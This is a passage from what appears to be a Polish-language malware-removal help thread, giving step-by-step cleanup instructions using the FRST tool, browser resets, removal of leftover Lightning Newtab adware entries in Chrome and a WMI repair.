fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Powstanie kolejny fixlog.txt. 2. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 3. W Google Chrome: - MBAM brutalnie usuwał katalog rozszerzenia adware Lightning Newtab. To nie jest poprawna metoda deinstalacji i pozostaje wpis rozszerzenia w preferencjach. Ustawienia > karta Rozszerzenia > sprawdź czy widać to tam i w razie czego odinstaluj. - Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Uruchom narzędzie Fix It usuwające błąd WMI numer 10: KLIK. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. .